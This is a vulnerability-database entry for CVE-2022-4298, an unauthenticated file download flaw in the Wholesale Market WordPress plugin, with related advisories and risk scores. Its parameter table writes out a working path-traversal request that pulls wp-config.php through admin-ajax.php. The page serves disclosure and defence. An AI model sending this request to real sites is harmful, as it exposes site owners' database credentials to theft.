Lucene search
K

CVE-2022-4298

πŸ—“οΈΒ 02 Jan 2023Β 21:49:31Reported byΒ WPScanTypeΒ 
cve
Β cve
πŸ”—Β web.nvd.nist.govπŸ‘Β 63Β Views🌐 WEB

The Wholesale Market WordPress plugin before 2.2.1 allows unauthenticated attackers to download arbitrary files

Related
Detection
Affected
Refs
Paths
ReporterTitlePublishedViews
Family
Circl
CVE-2022-4298
4 Jan 202311:55
–circl
CNNVD
WordPress plugin Wholesale Market θ·―εΎ„ιεŽ†ζΌζ΄ž
2 Jan 202300:00
–cnnvd
Cvelist
CVE-2022-4298 Wholesale Market < 2.2.1 - Unauthenticated Arbitrary File Download
2 Jan 202321:49
–cvelist
NVD
CVE-2022-4298
2 Jan 202322:15
–nvd
OSV
CVE-2022-4298
2 Jan 202322:15
–osv
Prion
Design/Logic Flaw
2 Jan 202322:15
–prion
Positive Technologies
PT-2023-14167 Β· WordPress Β· Wholesale Market
2 Jan 202300:00
–ptsecurity
RedhatCVE
CVE-2022-4298
23 May 202500:35
–redhatcve
Vulnrichment
CVE-2022-4298 Wholesale Market < 2.2.1 - Unauthenticated Arbitrary File Download
2 Jan 202321:49
–vulnrichment
wpexploit
Wholesale Market < 2.2.1 - Unauthenticated Arbitrary File Download
12 Dec 202200:00
–wpexploit
Rows per page
NVD
Vulners
Node
cedcommercewholesale_marketRange<2.2.1wordpress
[
  {
    "vendor": "Unknown",
    "product": "Wholesale Market",
    "versions": [
      {
        "status": "affected",
        "versionType": "custom",
        "version": "0",
        "lessThan": "2.2.1"
      }
    ],
    "defaultStatus": "unaffected",
    "collectionURL": "https://wordpress.org/plugins"
  }
]
ParameterPositionPathDescriptionCWE
actionquery paramwp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_read_csvUnauthenticated access to read CSV import/export moduleCWE-22
actionquery paramwp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.phpUnauthenticated arbitrary file download via path traversal to disclose sensitive filesCWE-22
tabquery paramwp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.phpUnauthenticated arbitrary file download via path traversal to disclose sensitive filesCWE-22
sectionquery paramwp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.phpUnauthenticated arbitrary file download via path traversal to disclose sensitive filesCWE-22
ced_cwsm_log_downloadquery paramwp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.phpUnauthenticated arbitrary file download via path traversal to disclose sensitive filesCWE-22

Data

Build on a solid foundation withΒ Vulners data

WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data

Api

Power your application withΒ Vulners API

The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access

App

Assess and manage vulnerabilities withΒ VulnersΒ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jun 2026 05:20Current
9.7High risk
Vulners AI Score9.7
CVSS 3.19.8
EPSS0.01833
SSVC
63